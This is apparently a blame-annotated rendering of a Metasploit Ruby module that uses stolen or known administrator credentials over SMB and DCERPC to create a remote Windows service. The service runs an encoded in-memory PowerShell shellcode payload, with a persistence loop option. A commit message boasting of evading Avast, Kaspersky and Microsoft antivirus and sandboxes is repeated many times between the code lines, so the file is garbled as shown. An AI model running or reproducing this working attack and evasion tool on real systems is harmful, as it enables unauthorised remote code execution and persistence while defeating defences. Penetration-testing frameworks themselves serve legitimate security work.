Add disk-less AV bypass PSExec module using PSH
This commit rewires the existing work on PSExec performed by R3dy,
HDM, and countless others, to execute a powershell command instead
of a binary written to the disk. This particular iteration uses
PSH to call .NET, which pull in WINAPI functions to execute the
shellcode in memory. The entire PSH script is compressed with ZLIB,
given a decompressor stub, encoded in base64 and executed directly
from the command-line with powershell -EncodedCommand.
In practice, this prevents us from having to write binaries with
shellcode to the target drive, deal with removal, or AV detection
at all. Moreover, the powershell wrapper can be quickly modified
to loop execution (included), or perform other obfu/delay in order
to confuse and evade sandboxing and other HIDS mechanisms.
This module has been tested with x86/x64 reverse TCP against win6,
win7 (32 and 64), and Server 2008r2. Targets tested were using
current AV with heuristic analysis and high identification rates.
In particular, this system evaded Avast, KAV current, and MS' own
offerings without any issue. In fact, none of the tested AVs did
anything to prevent execution or warn the user.
Lastly, please note that powershell must be running in the same
architecture as the payload being executed, since it pulls system
libraries and their functions from unmanaged memory. This means
that when executing x86 payloads on x64 targets, one must set the
RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
|
|
|
# -*- coding: binary -*-
|
2013-01-30 17:38:53 +00:00
|
|
|
#!/usr/bin/env ruby
|
|
|
|
|
|
Add disk-less AV bypass PSExec module using PSH
This commit rewires the existing work on PSExec performed by R3dy,
HDM, and countless others, to execute a powershell command instead
of a binary written to the disk. This particular iteration uses
PSH to call .NET, which pull in WINAPI functions to execute the
shellcode in memory. The entire PSH script is compressed with ZLIB,
given a decompressor stub, encoded in base64 and executed directly
from the command-line with powershell -EncodedCommand.
In practice, this prevents us from having to write binaries with
shellcode to the target drive, deal with removal, or AV detection
at all. Moreover, the powershell wrapper can be quickly modified
to loop execution (included), or perform other obfu/delay in order
to confuse and evade sandboxing and other HIDS mechanisms.
This module has been tested with x86/x64 reverse TCP against win6,
win7 (32 and 64), and Server 2008r2. Targets tested were using
current AV with heuristic analysis and high identification rates.
In particular, this system evaded Avast, KAV current, and MS' own
offerings without any issue. In fact, none of the tested AVs did
anything to prevent execution or warn the user.
Lastly, please note that powershell must be running in the same
architecture as the payload being executed, since it pulls system
libraries and their functions from unmanaged memory. This means
that when executing x86 payloads on x64 targets, one must set the
RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
|
Rank = ManualRanking
|
|
|
|
|
|
2013-01-30 17:38:53 +00:00
|
|
|
# Exploit mixins should be called first
|
Add disk-less AV bypass PSExec module using PSH
This commit rewires the existing work on PSExec performed by R3dy,
HDM, and countless others, to execute a powershell command instead
of a binary written to the disk. This particular iteration uses
PSH to call .NET, which pull in WINAPI functions to execute the
shellcode in memory. The entire PSH script is compressed with ZLIB,
given a decompressor stub, encoded in base64 and executed directly
from the command-line with powershell -EncodedCommand.
In practice, this prevents us from having to write binaries with
shellcode to the target drive, deal with removal, or AV detection
at all. Moreover, the powershell wrapper can be quickly modified
to loop execution (included), or perform other obfu/delay in order
to confuse and evade sandboxing and other HIDS mechanisms.
This module has been tested with x86/x64 reverse TCP against win6,
win7 (32 and 64), and Server 2008r2. Targets tested were using
current AV with heuristic analysis and high identification rates.
In particular, this system evaded Avast, KAV current, and MS' own
offerings without any issue. In fact, none of the tested AVs did
anything to prevent execution or warn the user.
Lastly, please note that powershell must be running in the same
architecture as the payload being executed, since it pulls system
libraries and their functions from unmanaged memory. This means
that when executing x86 payloads on x64 targets, one must set the
RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
|
|
|
include Msf::Exploit::Remote::DCERPC
|
|
|
|
|
include Msf::Exploit::Remote::SMB
|
|
|
|
|
include Msf::Exploit::Remote::SMB::Authenticated
|
2013-01-30 17:38:53 +00:00
|
|
|
include Msf::Exploit::Powershell
|
Add disk-less AV bypass PSExec module using PSH
This commit rewires the existing work on PSExec performed by R3dy,
HDM, and countless others, to execute a powershell command instead
of a binary written to the disk. This particular iteration uses
PSH to call .NET, which pull in WINAPI functions to execute the
shellcode in memory. The entire PSH script is compressed with ZLIB,
given a decompressor stub, encoded in base64 and executed directly
from the command-line with powershell -EncodedCommand.
In practice, this prevents us from having to write binaries with
shellcode to the target drive, deal with removal, or AV detection
at all. Moreover, the powershell wrapper can be quickly modified
to loop execution (included), or perform other obfu/delay in order
to confuse and evade sandboxing and other HIDS mechanisms.
This module has been tested with x86/x64 reverse TCP against win6,
win7 (32 and 64), and Server 2008r2. Targets tested were using
current AV with heuristic analysis and high identification rates.
In particular, this system evaded Avast, KAV current, and MS' own
offerings without any issue. In fact, none of the tested AVs did
anything to prevent execution or warn the user.
Lastly, please note that powershell must be running in the same
architecture as the payload being executed, since it pulls system
libraries and their functions from unmanaged memory. This means
that when executing x86 payloads on x64 targets, one must set the
RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
|
include Msf::Exploit::EXE
|
|
|
|
|
|
|
|
|
|
# Aliases for common classes
|
|
|
|
|
SIMPLE = Rex::Proto::SMB::SimpleClient
|
|
|
|
|
XCEPT = Rex::Proto::SMB::Exceptions
|
|
|
|
|
CONST = Rex::Proto::SMB::Constants
|
|
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
|
super(update_info(info,
|
|
|
|
|
'Name' => 'Microsoft Windows Authenticated Powershell Command Execution',
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
This module uses a valid administrator username and password to execute a powershell
|
|
|
|
|
payload using a similar technique to the "psexec" utility provided by SysInternals. The
|
|
|
|
|
payload is encoded in base64 and executed from the commandline using the -encodedcommand
|
|
|
|
|
flag. Using this method, the payload is never written to disk, and given that each payload
|
|
|
|
|
is unique, is not prone to signature based detection. Since executing shellcode in .NET
|
|
|
|
|
requires the use of system resources from unmanaged memory space, the .NET (PSH) architecture
|
|
|
|
|
must match that of the payload. Lastly, a persist option is provided to execute the payload
|
|
|
|
|
in a while loop in order to maintain a form of persistence. In the event of a sandbox
|
|
|
|
|
observing PSH execution, a delay and other obfuscation may be added to avoid detection.
|
|
|
|
|
},
|
|
|
|
|
|
|
|
|
|
'Author' => [
|
|
|
|
|
'Royce @R3dy__ Davis <rdavis[at]accuvant.com>', # PSExec command module
|
|
|
|
|
'RageLtMan <rageltman[at]sempervictus' # PSH exploit
|
|
|
|
|
],
|
|
|
|
|
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Privileged' => true,
|
|
|
|
|
'DefaultOptions' =>
|
|
|
|
|
{
|
|
|
|
|
'WfsDelay' => 10,
|
|
|
|
|
'EXITFUNC' => 'thread'
|
|
|
|
|
},
|
|
|
|
|
'Payload' =>
|
|
|
|
|
{
|
|
|
|
|
'Space' => 8192,
|
|
|
|
|
'DisableNops' => true,
|
|
|
|
|
'StackAdjustment' => -3500
|
|
|
|
|
},
|
|
|
|
|
'Platform' => 'win',
|
|
|
|
|
'Targets' =>
|
|
|
|
|
[
|
|
|
|
|
[ 'Automatic', { } ],
|
|
|
|
|
],
|
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
|
'References' => [
|
|
|
|
|
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
|
|
|
|
|
[ 'OSVDB', '3106'],
|
|
|
|
|
[ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ],
|
|
|
|
|
[ 'URL', 'http://sourceforge.net/projects/smbexec/' ],
|
|
|
|
|
[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
|
|
|
|
|
]
|
|
|
|
|
))
|
|
|
|
|
|
|
|
|
|
register_options([
|
|
|
|
|
OptBool.new('PERSIST', [false, 'Run the payload in a loop']),
|
|
|
|
|
OptBool.new('RUN_WOW64', [
|
|
|
|
|
false,
|
|
|
|
|
'Execute powershell in 32bit compatibility mode, payloads need native arch',
|
|
|
|
|
false
|
|
|
|
|
]),
|
2013-01-30 17:38:53 +00:00
|
|
|
OptBool.new('PSH_OLD_METHOD', [false, 'Use powershell 1.0', false]),
|
Add disk-less AV bypass PSExec module using PSH
This commit rewires the existing work on PSExec performed by R3dy,
HDM, and countless others, to execute a powershell command instead
of a binary written to the disk. This particular iteration uses
PSH to call .NET, which pull in WINAPI functions to execute the
shellcode in memory. The entire PSH script is compressed with ZLIB,
given a decompressor stub, encoded in base64 and executed directly
from the command-line with powershell -EncodedCommand.
In practice, this prevents us from having to write binaries with
shellcode to the target drive, deal with removal, or AV detection
at all. Moreover, the powershell wrapper can be quickly modified
to loop execution (included), or perform other obfu/delay in order
to confuse and evade sandboxing and other HIDS mechanisms.
This module has been tested with x86/x64 reverse TCP against win6,
win7 (32 and 64), and Server 2008r2. Targets tested were using
current AV with heuristic analysis and high identification rates.
In particular, this system evaded Avast, KAV current, and MS' own
offerings without any issue. In fact, none of the tested AVs did
anything to prevent execution or warn the user.
Lastly, please note that powershell must be running in the same
architecture as the payload being executed, since it pulls system
libraries and their functions from unmanaged memory. This means
that when executing x86 payloads on x64 targets, one must set the
RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
|
|
|
], self.class)
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
2013-01-30 17:38:53 +00:00
|
|
|
def exploit
|
|
|
|
|
command = cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD'])
|
Add disk-less AV bypass PSExec module using PSH
This commit rewires the existing work on PSExec performed by R3dy,
HDM, and countless others, to execute a powershell command instead
of a binary written to the disk. This particular iteration uses
PSH to call .NET, which pull in WINAPI functions to execute the
shellcode in memory. The entire PSH script is compressed with ZLIB,
given a decompressor stub, encoded in base64 and executed directly
from the command-line with powershell -EncodedCommand.
In practice, this prevents us from having to write binaries with
shellcode to the target drive, deal with removal, or AV detection
at all. Moreover, the powershell wrapper can be quickly modified
to loop execution (included), or perform other obfu/delay in order
to confuse and evade sandboxing and other HIDS mechanisms.
This module has been tested with x86/x64 reverse TCP against win6,
win7 (32 and 64), and Server 2008r2. Targets tested were using
current AV with heuristic analysis and high identification rates.
In particular, this system evaded Avast, KAV current, and MS' own
offerings without any issue. In fact, none of the tested AVs did
anything to prevent execution or warn the user.
Lastly, please note that powershell must be running in the same
architecture as the payload being executed, since it pulls system
libraries and their functions from unmanaged memory. This means
that when executing x86 payloads on x64 targets, one must set the
RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
|
|
|
|
2013-01-30 17:38:53 +00:00
|
|
|
#Try and authenticate with given credentials
|
Add disk-less AV bypass PSExec module using PSH
This commit rewires the existing work on PSExec performed by R3dy,
HDM, and countless others, to execute a powershell command instead
of a binary written to the disk. This particular iteration uses
PSH to call .NET, which pull in WINAPI functions to execute the
shellcode in memory. The entire PSH script is compressed with ZLIB,
given a decompressor stub, encoded in base64 and executed directly
from the command-line with powershell -EncodedCommand.
In practice, this prevents us from having to write binaries with
shellcode to the target drive, deal with removal, or AV detection
at all. Moreover, the powershell wrapper can be quickly modified
to loop execution (included), or perform other obfu/delay in order
to confuse and evade sandboxing and other HIDS mechanisms.
This module has been tested with x86/x64 reverse TCP against win6,
win7 (32 and 64), and Server 2008r2. Targets tested were using
current AV with heuristic analysis and high identification rates.
In particular, this system evaded Avast, KAV current, and MS' own
offerings without any issue. In fact, none of the tested AVs did
anything to prevent execution or warn the user.
Lastly, please note that powershell must be running in the same
architecture as the payload being executed, since it pulls system
libraries and their functions from unmanaged memory. This means
that when executing x86 payloads on x64 targets, one must set the
RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
|
|
|
if connect
|
2013-01-30 17:38:53 +00:00
|
|
|
begin
|
Add disk-less AV bypass PSExec module using PSH
This commit rewires the existing work on PSExec performed by R3dy,
HDM, and countless others, to execute a powershell command instead
of a binary written to the disk. This particular iteration uses
PSH to call .NET, which pull in WINAPI functions to execute the
shellcode in memory. The entire PSH script is compressed with ZLIB,
given a decompressor stub, encoded in base64 and executed directly
from the command-line with powershell -EncodedCommand.
In practice, this prevents us from having to write binaries with
shellcode to the target drive, deal with removal, or AV detection
at all. Moreover, the powershell wrapper can be quickly modified
to loop execution (included), or perform other obfu/delay in order
to confuse and evade sandboxing and other HIDS mechanisms.
This module has been tested with x86/x64 reverse TCP against win6,
win7 (32 and 64), and Server 2008r2. Targets tested were using
current AV with heuristic analysis and high identification rates.
In particular, this system evaded Avast, KAV current, and MS' own
offerings without any issue. In fact, none of the tested AVs did
anything to prevent execution or warn the user.
Lastly, please note that powershell must be running in the same
architecture as the payload being executed, since it pulls system
libraries and their functions from unmanaged memory. This means
that when executing x86 payloads on x64 targets, one must set the
RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
|
|
|
smb_login
|
|
|
|
|
rescue StandardError => autherror
|
|
|
|
|
print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
|
|
|
|
|
return
|
2013-01-30 17:38:53 +00:00
|
|
|
end
|
|
|
|
|
# Execute the powershell command
|
|
|
|
|
begin
|
|
|
|
|
print_status("#{peer} - Executing the payload...")
|
|
|
|
|
#vprint_good(command)
|
|
|
|
|
return psexec(command)
|
|
|
|
|
rescue StandardError => exec_command_error
|
|
|
|
|
print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
|
|
|
|
|
return false
|
|
|
|
|
end
|
|
|
|
|
disconnect
|
Add disk-less AV bypass PSExec module using PSH
This commit rewires the existing work on PSExec performed by R3dy,
HDM, and countless others, to execute a powershell command instead
of a binary written to the disk. This particular iteration uses
PSH to call .NET, which pull in WINAPI functions to execute the
shellcode in memory. The entire PSH script is compressed with ZLIB,
given a decompressor stub, encoded in base64 and executed directly
from the command-line with powershell -EncodedCommand.
In practice, this prevents us from having to write binaries with
shellcode to the target drive, deal with removal, or AV detection
at all. Moreover, the powershell wrapper can be quickly modified
to loop execution (included), or perform other obfu/delay in order
to confuse and evade sandboxing and other HIDS mechanisms.
This module has been tested with x86/x64 reverse TCP against win6,
win7 (32 and 64), and Server 2008r2. Targets tested were using
current AV with heuristic analysis and high identification rates.
In particular, this system evaded Avast, KAV current, and MS' own
offerings without any issue. In fact, none of the tested AVs did
anything to prevent execution or warn the user.
Lastly, please note that powershell must be running in the same
architecture as the payload being executed, since it pulls system
libraries and their functions from unmanaged memory. This means
that when executing x86 payloads on x64 targets, one must set the
RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
# This code was stolen straight out of psexec.rb. Thanks very much HDM and all who contributed to that module!!
|
|
|
|
|
# Instead of uploading and runing a binary. This method runs a single windows command fed into the COMMAND paramater
|
|
|
|
|
def psexec(command)
|
|
|
|
|
|
|
|
|
|
simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
|
|
|
|
|
|
|
|
|
|
handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
|
|
|
|
|
vprint_status("#{peer} - Binding to #{handle} ...")
|
|
|
|
|
dcerpc_bind(handle)
|
|
|
|
|
vprint_status("#{peer} - Bound to #{handle} ...")
|
|
|
|
|
|
|
|
|
|
vprint_status("#{peer} - Obtaining a service manager handle...")
|
|
|
|
|
scm_handle = nil
|
|
|
|
|
stubdata =
|
|
|
|
|
NDR.uwstring("\\\\#{rhost}") +
|
|
|
|
|
NDR.long(0) +
|
|
|
|
|
NDR.long(0xF003F)
|
|
|
|
|
begin
|
|
|
|
|
response = dcerpc.call(0x0f, stubdata)
|
|
|
|
|
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
|
|
|
|
|
scm_handle = dcerpc.last_response.stub_data[0,20]
|
|
|
|
|
end
|
|
|
|
|
rescue ::Exception => e
|
|
|
|
|
print_error("#{peer} - Error: #{e}")
|
|
|
|
|
return false
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
servicename = Rex::Text.rand_text_alpha(11)
|
|
|
|
|
displayname = Rex::Text.rand_text_alpha(16)
|
|
|
|
|
holdhandle = scm_handle
|
|
|
|
|
svc_handle = nil
|
|
|
|
|
svc_status = nil
|
|
|
|
|
|
|
|
|
|
stubdata =
|
|
|
|
|
scm_handle +
|
|
|
|
|
NDR.wstring(servicename) +
|
|
|
|
|
NDR.uwstring(displayname) +
|
|
|
|
|
|
|
|
|
|
NDR.long(0x0F01FF) + # Access: MAX
|
|
|
|
|
NDR.long(0x00000110) + # Type: Interactive, Own process
|
|
|
|
|
NDR.long(0x00000003) + # Start: Demand
|
|
|
|
|
NDR.long(0x00000000) + # Errors: Ignore
|
|
|
|
|
NDR.wstring( command ) +
|
|
|
|
|
NDR.long(0) + # LoadOrderGroup
|
|
|
|
|
NDR.long(0) + # Dependencies
|
|
|
|
|
NDR.long(0) + # Service Start
|
|
|
|
|
NDR.long(0) + # Password
|
|
|
|
|
NDR.long(0) + # Password
|
|
|
|
|
NDR.long(0) + # Password
|
|
|
|
|
NDR.long(0) # Password
|
|
|
|
|
begin
|
|
|
|
|
vprint_status("#{peer} - Creating the service...")
|
|
|
|
|
response = dcerpc.call(0x0c, stubdata)
|
|
|
|
|
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
|
|
|
|
|
svc_handle = dcerpc.last_response.stub_data[0,20]
|
|
|
|
|
svc_status = dcerpc.last_response.stub_data[24,4]
|
|
|
|
|
end
|
|
|
|
|
rescue ::Exception => e
|
|
|
|
|
print_error("#{peer} - Error: #{e}")
|
|
|
|
|
return false
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
vprint_status("#{peer} - Closing service handle...")
|
|
|
|
|
begin
|
|
|
|
|
response = dcerpc.call(0x0, svc_handle)
|
|
|
|
|
rescue ::Exception
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
vprint_status("#{peer} - Opening service...")
|
|
|
|
|
begin
|
|
|
|
|
stubdata =
|
|
|
|
|
scm_handle +
|
|
|
|
|
NDR.wstring(servicename) +
|
|
|
|
|
NDR.long(0xF01FF)
|
|
|
|
|
|
|
|
|
|
response = dcerpc.call(0x10, stubdata)
|
|
|
|
|
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
|
|
|
|
|
svc_handle = dcerpc.last_response.stub_data[0,20]
|
|
|
|
|
end
|
|
|
|
|
rescue ::Exception => e
|
|
|
|
|
print_error("#{peer} - Error: #{e}")
|
|
|
|
|
return false
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
vprint_status("#{peer} - Starting the service...")
|
|
|
|
|
stubdata =
|
|
|
|
|
svc_handle +
|
|
|
|
|
NDR.long(0) +
|
|
|
|
|
NDR.long(0)
|
|
|
|
|
begin
|
|
|
|
|
response = dcerpc.call(0x13, stubdata)
|
|
|
|
|
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
|
|
|
|
|
end
|
|
|
|
|
rescue ::Exception => e
|
|
|
|
|
print_error("#{peer} - Error: #{e}")
|
|
|
|
|
return false
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
vprint_status("#{peer} - Removing the service...")
|
|
|
|
|
stubdata =
|
|
|
|
|
svc_handle
|
|
|
|
|
begin
|
|
|
|
|
response = dcerpc.call(0x02, stubdata)
|
|
|
|
|
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
|
|
|
|
|
end
|
|
|
|
|
rescue ::Exception => e
|
|
|
|
|
print_error("#{peer} - Error: #{e}")
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
vprint_status("#{peer} - Closing service handle...")
|
|
|
|
|
begin
|
|
|
|
|
response = dcerpc.call(0x0, svc_handle)
|
|
|
|
|
rescue ::Exception => e
|
|
|
|
|
print_error("#{peer} - Error: #{e}")
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
select(nil, nil, nil, 1.0)
|
|
|
|
|
simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$")
|
|
|
|
|
return true
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def peer
|
|
|
|
|
return "#{rhost}:#{rport}"
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
end
|